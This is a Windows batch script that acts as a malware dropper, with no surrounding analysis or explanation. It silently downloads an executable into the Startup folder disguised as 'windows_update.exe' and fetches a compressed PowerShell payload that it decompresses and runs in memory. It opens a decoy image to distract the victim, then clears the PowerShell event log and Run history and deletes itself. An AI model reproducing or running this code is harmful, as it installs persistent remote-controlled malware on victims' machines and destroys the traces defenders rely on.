@echo off
SETLOCAL EnableDelayedExpansion

:: Execution guard
if "%__ALREADY_RUNNING%"=="1" exit /b
set "__ALREADY_RUNNING=1"

:: Use full PowerShell path
set "PS=%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe"

:: Phase 1: Download EXE to Startup
%PS% -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command ^
"$url='https://github.com/mitasahi/root/raw/main/oihFon.exe'; ^
$dest=[Environment]::GetFolderPath('Startup')+'\windows_update.exe'; ^
(New-Object Net.WebClient).Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy(); ^
(New-Object Net.WebClient).DownloadFile($url,$dest)"

:: Phase 2: Execute PS1 exactly like original (memory decompression)
%PS% -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command ^
"$url='https://github.com/mitasahi/root/raw/refs/heads/main/ps-persist.ps1.tar.gz'; ^
$wc=New-Object System.Net.WebClient; ^
$wc.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy(); ^
$data=$wc.DownloadData($url); ^
$ms=New-Object IO.MemoryStream(,$data); ^
$gz=New-Object IO.Compression.GzipStream($ms,[IO.Compression.CompressionMode]::Decompress); ^
$out=New-Object IO.MemoryStream; ^
$gz.CopyTo($out); ^
$script=[System.Text.Encoding]::ASCII.GetString($out.ToArray()); ^
iex $script; ^
$out.Close();$gz.Close();$ms.Close();$wc.Dispose()"

:: Open decoy
if exist "%~dp0Khabo.png" (
    start "" "%~dp0Khabo.png"
) else (
    echo Decoy file not found >nul
)

:: Cleanup
timeout /t 1 >nul
%PS% -WindowStyle Hidden -Command ^
"Clear-EventLog 'Windows PowerShell' -ErrorAction SilentlyContinue; ^
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -Force -ErrorAction SilentlyContinue"

:: Self-delete
del "%~f0" >nul 2>&1
